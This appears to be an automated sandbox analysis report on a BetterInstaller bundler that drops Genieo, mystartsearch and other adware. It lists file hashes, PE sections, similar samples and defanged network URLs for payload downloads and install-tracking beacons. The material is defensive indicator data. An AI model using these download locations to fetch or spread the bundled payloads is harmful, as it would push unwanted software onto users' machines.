    6e92fc22a6541bc4e5a78b37624e23d7 c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\gim394750002\bin\license.exe
    03bec7106b2e338a2ea305fb670a3efa c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\uninstall\genuninstallui.exe
    03bec7106b2e338a2ea305fb670a3efa c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\uninstall\gim394750002\genuninstallui.exe
    83a2f2256120d07303a589a3a173c080 c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\uninstall\gim394750002\partner_uninstall.exe
    83a2f2256120d07303a589a3a173c080 c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\uninstall\partner_uninstall.exe
    279f9df88a8c988a630547f5c485e7c6 c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\TrayUi\bin\gentray.exe
    7bfb3be3e7b0aea2b8d3df8fb28e11c7 c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\bin\IeSearchProvider.exe
    f49080e1e1330bd4c712da5109d19085 c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\bin\firsttime_setup.exe
    fd1018bc2d2e13587bea7add468e2149 c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\bin\genupdater.exe
    9edafc76bc2e693ba0387ec4f3d81ce3 c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\genieo_temp\InstallGenieo.exe
    dd7565902d9d990e163cf231782f5c81 c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\genieo_temp\genieo_setup.exe
    bc0917682cc2d59539b7e6c6ed2da3ca c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\uninstall\Elevate.exe
    f37d900bd0494d9dbbc688bb407d7061 c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\uninstall\updater_uninstall.exe
    dc18fb53cbc6626ad24459faae898aba c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\uninstall\firsttime_uninstall.exe
    634f09783517492c457987eddb48f94a c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\uninstall\framework_uninstall.exe
    4b9161c61c4ce0b3a6e39418df7a50a4 c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\uninstall\trayapp_uninstall.exe
    a5abe7fde433ba716f9cdb3b6c2a9c08 c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\Updater\genieo_temp\framework_setup.gen
    dd7565902d9d990e163cf231782f5c81 c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\Updater\genieo_temp\genieo_setup.gen
    d8dfbd86e6df480587a4b210c5b61184 c:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\Updater\genieo_temp\trayapp_setup.gen
    1087be1ed3e4cf8bac3dfb8bcf76facf c:\Users\"%CurrentUserName%"\AppData\Roaming\mystartsearch\UninstallManager.exe
    087550b157c8a88f409260ba2dce6386 c:\Windows\Installer\{1D76557F-04F5-4CF9-AB20-6A621B0D52D7}\ARPPRODUCTICON.exe
    1ac426eff09dd0d1d4b94f417b89ebbe c:\Windows\Installer\{1D76557F-04F5-4CF9-AB20-6A621B0D52D7}\NewShortcut28_DB02BE8E3D9146699630194C73D82113.exe
    e15ca4067359be510f05a3913e9ce111 c:\Windows\Installer\{1D76557F-04F5-4CF9-AB20-6A621B0D52D7}\NewShortcut291_65EB53C0CA204902B779CFAD143AB8AE.exe
    e15ca4067359be510f05a3913e9ce111 c:\Windows\Installer\{1D76557F-04F5-4CF9-AB20-6A621B0D52D7}\NewShortcut292_B804125AD6074B809DEB0A3B3FEFA478.exe
    e15ca4067359be510f05a3913e9ce111 c:\Windows\Installer\{1D76557F-04F5-4CF9-AB20-6A621B0D52D7}\NewShortcut293_74918538C0B34FDF91C302BD1080E70D.exe
    e15ca4067359be510f05a3913e9ce111 c:\Windows\Installer\{1D76557F-04F5-4CF9-AB20-6A621B0D52D7}\NewShortcut2941_25E2F3278D06439EA57FC4FE4CAD7B0A.exe
    e15ca4067359be510f05a3913e9ce111 c:\Windows\Installer\{1D76557F-04F5-4CF9-AB20-6A621B0D52D7}\NewShortcut294_57014926900C495186412973521D7E84.exe
    e15ca4067359be510f05a3913e9ce111 c:\Windows\Installer\{1D76557F-04F5-4CF9-AB20-6A621B0D52D7}\NewShortcut29_DB2D8C09055445ABAB719D6286A1C90F.exe

    HOSTS file anomalies

    No changes have been detected.

    Rootkit activity

    No anomalies have been detected.

    Propagation

  • VersionInfo

    Company Name:
    Product Name:
    Product Version:
    Legal Copyright:
    Legal Trademarks:
    Original Filename:
    Internal Name:
    File Version: 2.0.0.0
    File Description: Powered by BetterInstaller
    Comments:
    Language: English (United States)

    PE Sections

    Name Virtual Address Virtual Size Raw Size Entropy Section MD5
    .text 4096 28860 29184 4.36907 33e8227bf6edbf3997e3d0895494668e
    .data 36864 140 512 0.818223 1b0351714f371c0ba066871d4e504b00
    .rdata 40960 3196 3584 3.54441 88a268b1fac88e9fad865c68cf3abce2
    .bss 45056 110088 0 0 d41d8cd98f00b204e9800998ecf8427e
    .idata 155648 4932 5120 3.53424 11c816edc4ef9cc4aa5511f8a707232b
    .ndata 163840 36864 1024 0 0f343b0931126a20f133d67c2b018a3b
    .rsrc 200704 17800 17920 3.9497 3b952b6cf19449d255a36efe2cd57cc1

    Dropped from:

    Downloaded by:

    Similar by SSDeep:

    Similar by Lavasoft Polymorphic Checker:

    Total found: 3653
    7f6d030a23f210ff0f767468fe3edd48
    13df569a80b0b685ba250ad7617fe738
    a16c30b5aa236dc78beea2d35406b2b7
    b3fa5976434ce1e51a1bd370e2aefd3c
    7f9d59c48734f851495f71f0c539537b
    22754d84b6a8863fdb8bcc5c56c849cb
    58fe62f415a645bea095e193a1676101
    2a2a5c35d16c851fbe31471dc439b39c
    92c551fd1abfe685fd18911e9ab08526
    0d213295b19e20e1fecc37345c3e009b
    e7b769fcb3292ae349d046038146b08d
    a6fc7dda6bdd315dfd5980ac76fb22d0
    ba8a944ac777b66e2f8831e41c48a17e
    52f55df57abbba5785a9fc223655676d
    43e6206ab7ba8f798441f29b86ac7746
    4d902dec4a5b50281707f4ae914f853b
    6eaa9b54f455c4c0aebd26f847a4ef05
    fa568de8c5815df8a0c6fec135476113
    0883493675fa324944249a6c3c4aeb17
    0924a97410f42990ad386b5bdb21f889
    2bcd76f0a9b4b3151850d1db2761b68f
    2ea994d2f286cd806e704ca7725c69b5
    69279cea1d82594133ed3888ccdbf2e6
    a1dd42f3bf738a74cfd93d9baf7e383d
    f851beeaa9065db1ee91294fc5689b2c
    74fc1165f17d69e1205b8624e8b5fbbe

    URLs

    URL IP
    hxxp://78.138.127.15/pinger?event_type=offer_accepted&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=sourceapp_b2b&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=2&index_in_screen=1&index_in_session=2&0.4314217413277596
    hxxp://78.138.127.15/pinger?event_type=offer_shown&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=appshat_madness&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=3&index_in_screen=1&index_in_session=3&display_height=90&0.8723355811491985
    hxxp://78.138.127.15/pinger?event_type=offer_accepted&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=appshat_madness&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=3&index_in_screen=1&index_in_session=3&0.7870902808395388
    hxxp://78.138.127.15/pinger?event_type=offer_shown&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=geneio_non_search_for_pc&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=4&index_in_screen=1&index_in_session=4&display_height=75&0.7763572020438432
    hxxp://78.138.127.15/pinger?event_type=offer_accepted&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=geneio_non_search_for_pc&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=4&index_in_screen=1&index_in_session=4&0.7410277599261255
    hxxp://xa.xingcloud.com/v4/sof-installer/535559167_132775_B48A115F?action1=xa.geoip&action2=visit&action3=smt.visit.mystartsearch&update1=ref,smt&update2=identifier,installer&update3=version,6.3.76.1518&update4=nation,us&update5=language,en 65.255.35.143
    hxxp://78.138.127.15/pinger?event_type=install_start&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=mystartsearch&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=1&index_in_screen=1&index_in_session=1&0.3823084710495085
    hxxp://www.inisxriy.com/infv3/index/2606/bnd/6.3.76.1518/7a9c839b08544f0d77986f6e82d16b3f 50.23.120.53
    hxxp://www.inisxriy.com/files/zip_r3/2606_ba3a47c5781b0c9bb6f586b6519791f6/1.zip 50.23.120.53
    hxxp://xa.xingcloud.com/v4/sof-installer/535559167_132775_B48A115F?action=smt.dlzip1.mystartsearch.finish,11 65.255.35.143
    hxxp://xa.xingcloud.com/v4/sof-installer/535559167_132775_B48A115F?action=smt.installer.mystartsearch.hp 65.255.35.143
    hxxp://log.very911.com/install.gif?bundle=mystartsearch&ptid=smt&uid=535559167_132775_B48A115F 184.173.191.224
    hxxp://xa.xingcloud.com/v4/sof-installer/535559167_132775_B48A115F?action=smt.installer.mystartsearch.regok 65.255.35.143
    hxxp://xa.xingcloud.com/v4/sof-installer/535559167_132775_B48A115F?action=smt.installer.mystartsearch.ds 65.255.35.143
    hxxp://www.google.com/ 173.194.113.212
    hxxp://www.google.com.ua/?gfe_rd=cr&ei=W9bJVMMilK7zB9SFgLAN 173.194.113.215
    hxxp://xa.xingcloud.com/v4/sof-installer/535559167_132775_B48A115F?action=smt.installer.mystartsearch.nt.ff.tab 65.255.35.143
    hxxp://xa.xingcloud.com/v4/sof-installer/535559167_132775_B48A115F?action=smt.installer.mystartsearch.finish 65.255.35.143
    hxxp://www.inisxriy.com/infv3/index/2606/3rd/6.3.76.1518/37f90e7172ce364049fd177205bf4b1d 50.23.120.53
    hxxp://www.inisxriy.com/files/zip_r3/2606_ecd79b66f49d1d1c707187ca5bffb0b3/2.zip 50.23.120.53
    hxxp://xa.xingcloud.com/v4/sof-installer/535559167_132775_B48A115F?action=smt.installer.mystartsearch.ient 65.255.35.143
    hxxp://www.alchcz.cc/files/third/2015/01/16/172511/350/XTab_4.0.2.1716.exe 50.97.209.234
    hxxp://xa.xingcloud.com/v4/sof-installer/535559167_132775_B48A115F?action=smt.installer.mystartsearch.wpm 65.255.35.143
    hxxp://78.138.127.15/pinger?event_type=install_complete&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=mystartsearch&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=1&index_in_screen=1&index_in_session=1&0.4327788826737436
    hxxp://78.138.127.15/pinger?event_type=install_start&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=sourceapp_b2b&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=2&index_in_screen=1&index_in_session=2&0.20616356933149288
    hxxp://sourceapp.info/mg?alpha=Q2QKaQIuUEMZZzMfJUMNfC1Iegcddw5VQjhpV25cFmAnP0cAW10SbDcjFW5SaXMSSQ1GE3lvR10QRkdiQzNrYQJfZkBycmY7Gh5VKTclUw0BeAw4XlVhXwgCNQoINh5FNVZiBxYYCgJsQSYWb1Mfcg88fkMEPShNHD8bNFEXJys4eS1mQnAEGD0aZlU bnwGCgZ8GmUYWGJJQFxmBwl SB8OBw8M
    hxxp://sourceapp.info/mg?alpha=Q2QKaQJ6JUg3MX9TJUMNQiBZZAJDIggYAkMPCyofMzRLCnQTGRcba0NUCx0lGnASNAgxEmxsNithXUcWUGwwZHc7MxYmCRNSQzZrVi9y
    hxxp://sourceapp.info/mg?alpha=SVwbaBdSRnpqbQtkNEIYdhVZexIXcRo5YFIuSQ==
    hxxp://sourceapp.info/fp?alpha=eidVXnZYX00SEgEPenR5e2MGU3Z6e0MvN10mFEEqfTNYXjB4VlVeHXtkSC4mO0QjDgtnVTxeRntTcgdiYnpfLAAcImE2cy0JQU1gX3MuU2k5JlYSKG0/AipzBElVHGN/cxRKcipdXCEafWBJRSQgNFgKCXtZO1gpZyEEAHYtMXdTZmliRgAlNn5FSydSNyswZGk7Qwh7fHMIMnMNWVFJdy1/GUt3P1pVOB5xdRtaN3U2QFleagU5SmY7LGRaPyoscBYQcHBEGi50JxwMelNkM0wQTC0BTX5hIAAjdwxPVx58LTVVRRR2BQF3Xzt1PQ1xc28EXkgUHThVN2ImBjh2OjdwCg1lJR9CdF9+RUZSDiBSLXJNPlISW2UhBD93DE9ebmgPcXs8By0dRA87ZQEI
    hxxp://sourceapp.info/ii?alpha=eidVXnYRaD9QRktAenR5e2MGU3Z6e1l2e08UQU8zKHsfGTNvVjZ3XTo2HClnZicJTV84KG9RNmYgARxgfmwrVh4WJxVGdCltGhguR3ZMcyl4OhZePC91DSIACUpWHRx9a3w7di5GUS8aCng7LiIkLFh9eHpZPCpAZSd2AHYiNCRdFlIoFUJxLmVDWj0ELz0ydjo/Vw08OHdWUDRTRA5JIjwqVgomOQ8Afmo6Oi9VJiYvUBUDeFE7QjVgJAYDdigndiJfRyhyIWZ0OAcSY1MqRGkqbGQUTDZ8JAQ/JFUNQUMpOiNLRQ52CBd3WyczDUhAf28EVE05QTxMVCR+UlcjPCt2AFFINWlSYG0uARh6WXkzOmQ+JVIRLWoiATI1WQsRRTkpZkkZIHRLXzgZZmVfB2R6YA5cBw8PbABtJXkUGgUhK20LVARGUxM0fjhaTX1AKicmKjp7XkY8PWQNK3YQSFcefCEnBEhzJV5VIh1+b0tZLSYwWgwObAV/UVIbZlVANWNiTyNHRWdCUhZyOQceclo3QCAXS1gqH141YVsyAlkPDk8/aiNXG34uTR8lGV86FQdSeWM=
    hxxp://sourceapp.info/if?alpha=fSMdXUFYdGp/eUZaMndOfGdOUEF9fxF1TEgQCUwEL39XGgRoUn50aj0yVCpQYSNBTmg/LCdSAWEkSR9XeWhjVSkRI11FQy5pUhsZQHIEcB5/Pl5dCyhxRSE3Dk4eHit6bzQ4QSlCGSwtDXxzLRUjKBB+T31ddCl3YiM+A0EtJWw+b0Z9AzgZdTtwAUhdQCxqB2xnDVFbZiVeZ0wJTR4aQ3tzX0lMNl0fKSt7YxcPRXdHWlcwJAA7H18+ZxkXAy0gEx9odSxeQVksYQJaFAE9ajVGPT4NW0g0WhdyTG4uCUAePzsBHklPBkN/cDgiHUsWJShKUXlrCjAZViMoMVgEOikiAmFXMTgYGXggTBsEBjMLcRxpalhPRDR4GX1RdV0PWQg5MRgUGjhVDS0xfn8GXRAgJVtdfzsMIAoTIXQfWkdyZmBDNwV+HB0WcigGLUpWfzJwGy8nflJEL3McMSJPHFtKHmJkHw1JLElDKW9yKBcKViw8GBQ8fVdlAlJsJUwLUnh8ZFs9ESBVQUYmeA9OQEUuDU4Ebn1OEA0NWw9wA15deUYfPzcQF1RLT35YTAZxdQJTeiVsXXskBiZVb29jDEJB
    hxxp://78.138.127.15/pinger?event_type=install_fail&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=sourceapp_b2b&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=2&index_in_screen=1&index_in_session=2&0.005616250394906319
    hxxp://78.138.127.15/pinger?event_type=install_start&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=appshat_madness&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=3&index_in_screen=1&index_in_session=3&0.23028674511194408
    hxxp://cds.c5z6s5a3.hwcdn.net/smt2b/all/hat/row/setup.exe
    hxxp://errors.crossrider.com/utility.gif?error=start&report=mini_s&ver=820&action=na&ms_vr=3&clock=0&rnd=8839 208.85.150.249
    hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=820&i=10&n=ms_started&rnd=12312 208.85.150.249
    hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=820&i=20&n=ms_start_download&rnd=24566 208.85.150.249
    hxxp://cds.c5z6s5a3.hwcdn.net/smt2b/all/hat/row/setup.exe_c
    hxxp://cds.c5z6s5a3.hwcdn.net/smt2b/all/hat/row/setup.exe_e
    hxxp://cds.c5z6s5a3.hwcdn.net/smt2b/all/hat/row/setup.exe_d
    hxxp://cds.c5z6s5a3.hwcdn.net/smt2b/all/hat/row/setup.exe_a
    hxxp://cds.c5z6s5a3.hwcdn.net/smt2b/all/hat/row/setup.exe_b
    hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=820&i=30&n=ms_download_success&rnd=20443 208.85.150.249
    hxxp://xa.xingcloud.com/v4/searchprotect/535559167_132775_B48A115F?action=visit.heartbeat.smt&update0=ref,smt&update1=nation,us&update2=language,en&update3=version,4.0.1.1716 65.255.35.143
    hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=820&i=35&n=ms_about_to_exc&rnd=9760 208.85.150.249
    hxxp://errors.crossrider.com/utility.gif?error=mem_strt&report=mini_s&ver=820&action=na&ms_vr=3&clock=10817&rnd=3993 208.85.150.249
    hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=100&n=init_start_funnel_step_name&rnd=1422513827
    hxxp://ipgeoapi.com/ 54.235.151.26
    hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&app=65743&appver=0&ver=1_36_01_22&version_date=15-01-29&bic=AC5F59911E7B4F9F831F542369865C6AIE&verifier=705e42e0bb6c74a04369956d99485df5&upi=d5d8d8a61601751d467a5854a16ce35a&procid=0636C86E452B4A66857E1D1F9F48A1BAPI&srcid=000820&subid=0&zdata=appshatmadness&browser=ie&browserver=10&default=ie&chver=35.0.1916.153&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_21&silent=1&os=7(64bit)&osbuild=7601&osprod=Windows 7 Professional N&ossp=Service Pack 1&osinstdt=1363796288&admin=1&type=85899350025&asw=0&asw2=1073750533&asw3=-2147483648&asw4=0&crtnm=ColoColoApps&procstarttime=1422513827&procruntime=4&rnd=1422513831
    hxxp://cds.c5z6s5a3.hwcdn.net/monetization.gif?event=3&ibic=AC5F59911E7B4F9F831F542369865C6AIE&verifier=705e42e0bb6c74a04369956d99485df5&campaign=000820&country=ua&app=65743&os=7(64bit)&defbro=ie&chver=35.0.1916.153&ffver=29.0.1&iever=10.0.9200.16521&starttime=1422513827&asw=0_1073750533_-2147483648_0&browser=ff,ie,de&rnd=1422513827
    hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=200&n=init_end_funnel_step_name&rnd=1422513832
    hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=300&n=deploy_start_funnel_step_name&rnd=1422513832
    hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1422513835
    hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=500&n=deploy_notification_start_funnel_step_name&rnd=1422513835
    hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1422513835
    hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=700&n=deploy_ch_start_funnel_step_name&rnd=1422513835
    hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=800&n=deploy_nova_start_funnel_step_name&rnd=1422513836
    hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=900&n=deploy_ff_start_funnel_step_name&rnd=1422513836
    hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1422513842
    hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1422513842
    hxxp://cds.c5z6s5a3.hwcdn.net/plugin/apps/65743/manifest/1_36_01_22/ie10/manifest.xml?ver=21&rnd=6562
    hxxp://s3-website-us-east-1.amazonaws.com/stats.gif?action=daily&app=65743&bic=AC5F59911E7B4F9F831F542369865C6AIE&verifier=705e42e0bb6c74a04369956d99485df5&ver=1_36_01_22&installtime=1422513827&os=7&browser=ie&browserver=10&ffver=29&chromever=35&srcid=000820&subid=0&zdata=appshatmadness&appver=21&bgver=1&pluginsver=17&curtime=1422513849&lifetime=22&rnd=6039
    hxxp://cds.c5z6s5a3.hwcdn.net/plugin/apps/65743/manifest/1_36_01_22/ie10/manifest.xml?ver=21&rnd=6787
    hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1422513850
    hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1422513853
    hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000820&i=10000&n=deploy_end_funnel_step_name&rnd=1422513853
    hxxp://a1621.g.akamai.net/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?52d20c74d0048ebb
    hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=finished&app=65743&appver=21&ver=1_36_01_22&version_date=15-01-29&bic=AC5F59911E7B4F9F831F542369865C6AIE&verifier=705e42e0bb6c74a04369956d99485df5&upi=d5d8d8a61601751d467a5854a16ce35a&procid=0636C86E452B4A66857E1D1F9F48A1BAPI&srcid=000820&subid=0&zdata=appshatmadness&browser=ie&browserver=10&default=ie&chver=35.0.1916.153&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_21&silent=1&os=7(64bit)&osbuild=7601&osprod=Windows 7 Professional N&ossp=Service Pack 1&osinstdt=1363796288&admin=1&type=85899350025&asw=0&asw2=1073750533&asw3=-2147483648&asw4=0&crtnm=ColoColoApps&ieprofiles=1&chprofiles=na&ffprofiles=1&procstarttime=1422513827&procruntime=28&rnd=1422513855
    hxxp://a1363.dscg.akamai.net/pki/crl/products/microsoftrootcert.crl
    hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=install&app=65743&appver=21&ver=1_36_01_22&version_date=15-01-29&bic=AC5F59911E7B4F9F831F542369865C6AIE&verifier=705e42e0bb6c74a04369956d99485df5&upi=d5d8d8a61601751d467a5854a16ce35a&procid=0636C86E452B4A66857E1D1F9F48A1BAPI&srcid=000820&subid=0&zdata=appshatmadness&browser=ie&browserver=10&default=ie&chver=35.0.1916.153&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&installtime=1422513827&lifetime=0&silent=1&crtnm=ColoColoApps&procstarttime=1422513827&procruntime=28&rnd=1422513855
    hxxp://a1363.dscg.akamai.net/pki/crl/products/WinPCA.crl
    hxxp://a1363.dscg.akamai.net/pki/crl/products/MicrosoftTimeStampPCA.crl
    hxxp://cds.c5z6s5a3.hwcdn.net/monetization.gif?event=4&ibic=AC5F59911E7B4F9F831F542369865C6AIE&verifier=705e42e0bb6c74a04369956d99485df5&campaign=000820&country=ua&app=65743&os=7(64bit)&defbro=ie&chver=35.0.1916.153&ffver=29.0.1&iever=10.0.9200.16521&starttime=1422513827&asw=0_1073750533_-2147483648_0&browser=ff,ie,de&rnd=1422513827
    hxxp://errors.crossrider.com/utility.gif?error=done_mem_0&report=mini_s&ver=820&action=na&ms_vr=3&clock=43062&rnd=25839 208.85.150.249
    hxxp://bigspeedpro.com/webplayer/appshat/config.json
    hxxp://pagespeed.googlehosted.com/images/64x64.ico
    hxxp://pagespeed.googlehosted.com/images/16x16.ico
    hxxp://78.138.127.15/pinger?event_type=install_complete&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=appshat_madness&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=3&index_in_screen=1&index_in_session=3&0.28958118764499907
    hxxp://pagespeed.googlehosted.com/home
    hxxp://78.138.127.15/pinger?event_type=install_start&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=geneio_non_search_for_pc&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=4&index_in_screen=1&index_in_session=4&0.6194686390575159
    hxxp://78.138.127.15/pinger?event_type=install_complete&installer_source=better_installer&software_type=sponsored&muid=96d78f35e7b7ea4fc32736d428df43b4&client_uid=4b5cb7aab8d80a4ba5daaec3cbcf46f0&uniqid=574d51bb688892ce2c77d046dcd15567&affiliate_id=mypdfconverterfr&software_id=mypdfconverterfr&sponsored_id=geneio_non_search_for_pc&tokyo_csrf2_key=683d8b67bd80d41c0188be1c673a9a9e&tokyo_csrf2_timestamp=1422513658&slot_number=4&index_in_screen=1&index_in_session=4&0.30974286226175074
    hxxp://ghs.l.google.com/track?uid={E8BFA998-168D-400E-B9E0-F41B76A5DFC7}&partner=gim394750002&data=updater_ping=&revision_core=0&revision_updater=0&revision_partner=0&os_version=Microsoft Windows 7 Professional Service Pack 1 (build 7601), 64-bit&java_version=1.6
    hxxp://s3-2-w.amazonaws.com/partner/gim394750002/release/live/partner_manifest.xml
    hxxp://s3-2-w.amazonaws.com/partner/gim394750002/release/r16741/genieo_setup.gen
    hxxp://app.mypdfconverter.com/gv/en/MyPDFConverter.msi 178.33.88.173
    hxxp://s3-2-w.amazonaws.com/core/release/r16741/updater_manifest.xml
    hxxp://s3-2-w.amazonaws.com/core/release/r16741/manifest.xml
    hxxp://s3-2-w.amazonaws.com/core/release/r16741/trayapp_setup.gen
    hxxp://s3-2-w.amazonaws.com/core/release/r16741/framework_setup.gen
    hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEFIA5aolVvwahu2WydRLM8c=
    hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTSqZMG5M8TA9rdzkbCnNwuMAd5VgQUz5mp6nsm9EvJjo/X8AUm7+PSp50CEF1tL3zAt8MdpkWloaIHgTk=
    hxxp://a1621.g.akamai.net/msdownload/update/v3/static/trustedr/en/authrootstl.cab?b77e166e5d8add6a
